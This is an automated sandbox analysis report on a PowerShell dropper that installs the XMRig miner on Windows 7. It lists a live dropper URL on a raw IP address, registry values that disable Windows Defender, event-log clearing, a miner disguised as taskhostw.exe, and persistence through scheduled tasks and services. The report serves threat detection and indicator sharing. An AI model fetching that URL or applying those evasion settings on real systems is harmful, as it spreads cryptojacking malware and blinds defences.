xmrig | c0fe0c93b610f4e952a51febb4d1473ca9b164250cb6b94b3a360a7c39a7b66e

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-03-2024 08:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

get.ps1
Size

8KB
MD5

ae465af2287d24ccdeec8035a1e3f159
SHA1

e32c4c6c0a46e409cb81a28fe1aefc2e1aae569b
SHA256

c0fe0c93b610f4e952a51febb4d1473ca9b164250cb6b94b3a360a7c39a7b66e
SHA512

431361d8db7b27cbe22f56379ac6e68c54161bdb4702359ed927f9bb144c1f160688165805d3872044bf884fd66467f2c9da0b048a377d3b50010fcff5104be6
SSDEEP

192:Gswo+GbNlXOxscP5FTHkcJqYfZ13JkIL1SgQ4iPYyoc:Rh+qLOxFxicYIZ13KIU/dPYyj

Score

10^/10

xmrig evasion miner persistence ransomware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://111.90.158.40/kill.png?random=20240328084732

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

XMRig Miner payload 8 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\Fonts\taskhostw.exe	family_xmrig
C:\Windows\Fonts\taskhostw.exe	xmrig
\Windows\Fonts\taskhostw.exe	family_xmrig
\Windows\Fonts\taskhostw.exe	xmrig
C:\Windows\Fonts\taskhostw.exe	family_xmrig
C:\Windows\Fonts\taskhostw.exe	xmrig
\Windows\Fonts\taskhostw.exe	family_xmrig
\Windows\Fonts\taskhostw.exe	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Clears Windows event logs 1 TTPs 8 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid process

1908 wevtutil.exe
2312 wevtutil.exe
1656 wevtutil.exe
1120 wevtutil.exe
2252 wevtutil.exe
1936 wevtutil.exe
1600 wevtutil.exe
1824 wevtutil.exe

pid	process
1908	wevtutil.exe
2312	wevtutil.exe
1656	wevtutil.exe
1120	wevtutil.exe
2252	wevtutil.exe
1936	wevtutil.exe
1600	wevtutil.exe
1824	wevtutil.exe

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
4	1964	powershell.exe
6	1964	powershell.exe
7	1964	powershell.exe
8	1964	powershell.exe
12	1964	powershell.exe
13	1964	powershell.exe
14	1964	powershell.exe
18	1964	powershell.exe
21	2104	powershell.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Drops file in Drivers directory 12 IoCs

Processes:

powershell.exeexpand.exeexpand.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\aswArPots.sys.tmp	powershell.exe
File opened for modification	C:\Windows\System32\drivers\$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\$dpx$.tmp\job.xml	expand.exe
File created	C:\Windows\System32\drivers\aswArPots.sys.tmp	powershell.exe
File opened for modification	C:\Windows\System32\drivers\$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\$dpx$.tmp\job.xml	expand.exe
File created	C:\Windows\System32\drivers\$dpx$.tmp\056f6d4006b0a5429952941d8465cf86.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\aswArPots.sys	expand.exe
File created	C:\Windows\System32\drivers\IObitUnlockers.sys.tmp	powershell.exe
File created	C:\Windows\System32\drivers\$dpx$.tmp\17daa3ff650f43449680890d827a26b1.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\IObitUnlockers.sys	expand.exe
File opened for modification	C:\Windows\System32\drivers\IObitUnlockers.sys.tmp	powershell.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1964 powershell.exe
Executes dropped EXE 6 IoCs

Processes:

curl.exesmartsscreen.execurl.execurl.execurl.exetaskhostw.exe

pid process

664 curl.exe
2252 smartsscreen.exe
1676 curl.exe
1068 curl.exe
2788 curl.exe
2248 taskhostw.exe
Loads dropped DLL 5 IoCs

Processes:

smartsscreen.exe

pid process

2252 smartsscreen.exe
2252 smartsscreen.exe
2252 smartsscreen.exe
2252 smartsscreen.exe
2252 smartsscreen.exe
Drops desktop.ini file(s) 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\$Recycle.Bin\S-1-5-21-406356229-2805545415-1236085040-1000\desktop.ini powershell.exe

pid	process
664	curl.exe
2252	smartsscreen.exe
1676	curl.exe
1068	curl.exe
2788	curl.exe
2248	taskhostw.exe

pid	process
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe

description	ioc	process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-406356229-2805545415-1236085040-1000\desktop.ini	powershell.exe

Drops file in System32 directory 6 IoCs

Processes:

expand.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\System32\$dpx$.tmp\job.xml	expand.exe
File created	C:\Windows\System32\$dpx$.tmp\43a710cbf22d6048990475f6e0227e33.tmp	expand.exe
File opened for modification	C:\Windows\System32\oci.dll	expand.exe
File opened for modification	C:\Windows\System32\oci.dll.tmp	powershell.exe
File created	C:\Windows\System32\oci.dll.tmp	powershell.exe

Drops file in Windows directory 45 IoCs

Processes:

powershell.exeexpand.exeexpand.exeexpand.execurl.exeexpand.exeexpand.exeexpand.exeexpand.execurl.execurl.execurl.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	powershell.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM	powershell.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File created	C:\Windows\Fonts\$dpx$.tmp\b5ac6e153a93f64c917fb0e91b792319.tmp	expand.exe
File opened for modification	C:\Windows\Logs\HomeGroup	powershell.exe
File opened for modification	C:\Windows\Fonts\curl.exe.tmp	powershell.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\Fonts\taskhostw.exe	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File created	C:\Windows\Fonts\config.json	curl.exe
File opened for modification	C:\Windows\Logs\DPX	powershell.exe
File created	C:\Windows\Fonts\$dpx$.tmp\33f441f5b3985e4783294f1b1cae39f4.tmp	expand.exe
File created	C:\Windows\Fonts\$dpx$.tmp\f4566322433f894589c670399e71b387.tmp	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Logs\CBS	powershell.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	powershell.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File created	C:\Windows\Fonts\curl.exe.tmp	powershell.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Fonts\curl.exe	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp	expand.exe
File created	C:\Windows\Fonts\$dpx$.tmp\5b5e98107916c345a04327412fe60a79.tmp	expand.exe
File opened for modification	C:\Windows\Fonts\smartsscreen.exe.tmp2	expand.exe
File opened for modification	C:\Windows\Fonts\smartsscreen.exe.tmp	powershell.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Fonts\WinRing0x64.sys	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Fonts\$dpx$.tmp	expand.exe
File created	C:\Windows\Fonts\smartsscreen.exe.tmp	curl.exe
File created	C:\Windows\Fonts\taskhostw.png	curl.exe
File created	C:\Windows\Fonts\WinRing0x64.png	curl.exe

Launches sc.exe 17 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2988	sc.exe
2376	sc.exe
1688	sc.exe
2152	sc.exe
1924	sc.exe
1976	sc.exe
1972	sc.exe
1124	sc.exe
1920	sc.exe
1656	sc.exe
2292	sc.exe
1916	sc.exe
1748	sc.exe
1596	sc.exe
1080	sc.exe
1216	sc.exe
700	sc.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1428 schtasks.exe
2480 schtasks.exe
1064 schtasks.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2516 taskkill.exe
524 taskkill.exe
1440 taskkill.exe
2648 taskkill.exe
2444 taskkill.exe
2412 taskkill.exe

pid	process
1428	schtasks.exe
2480	schtasks.exe
1064	schtasks.exe

pid	process
2516	taskkill.exe
524	taskkill.exe
1440	taskkill.exe
2648	taskkill.exe
2444	taskkill.exe
2412	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

smartsscreen.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	smartsscreen.exe

Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

smartsscreen.exe

pid process

2252 smartsscreen.exe

pid	process
2252	smartsscreen.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

powershell.exepowershell.exesmartsscreen.exe

pid	process
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
2104	powershell.exe
1964	powershell.exe
1964	powershell.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
2252	smartsscreen.exe
1964	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

464
464
464
464
464

pid	process
464
464
464
464
464

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

powershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepowershell.exetaskkill.exesmartsscreen.exetaskhostw.exe

description	pid	process
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2444	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	524	taskkill.exe
Token: SeSecurityPrivilege	1120	wevtutil.exe
Token: SeBackupPrivilege	1120	wevtutil.exe
Token: SeSecurityPrivilege	2252	wevtutil.exe
Token: SeBackupPrivilege	2252	wevtutil.exe
Token: SeSecurityPrivilege	1936	wevtutil.exe
Token: SeBackupPrivilege	1936	wevtutil.exe
Token: SeSecurityPrivilege	1600	wevtutil.exe
Token: SeBackupPrivilege	1600	wevtutil.exe
Token: SeSecurityPrivilege	1824	wevtutil.exe
Token: SeBackupPrivilege	1824	wevtutil.exe
Token: SeSecurityPrivilege	1908	wevtutil.exe
Token: SeBackupPrivilege	1908	wevtutil.exe
Token: SeSecurityPrivilege	2312	wevtutil.exe
Token: SeBackupPrivilege	2312	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	1440	taskkill.exe
Token: SeDebugPrivilege	2252	smartsscreen.exe
Token: SeLockMemoryPrivilege	2248	taskhostw.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

taskhostw.exe

pid process

2248 taskhostw.exe

pid	process
2248	taskhostw.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1964 wrote to memory of 2584	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2584	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2584	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2624	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2624	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2624	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2752	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2752	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2752	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2552	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2552	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2552	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2740	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2740	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2740	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2640	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2640	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2640	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2528	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2528	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2528	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2932	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2932	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2932	1964	powershell.exe	schtasks.exe
PID 1964 wrote to memory of 2648	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2648	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2648	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2444	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2444	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2444	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2412	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2412	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2412	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2516	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2516	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2516	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 2988	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 2988	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 2988	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 1916	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 1916	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 1916	1964	powershell.exe	sc.exe
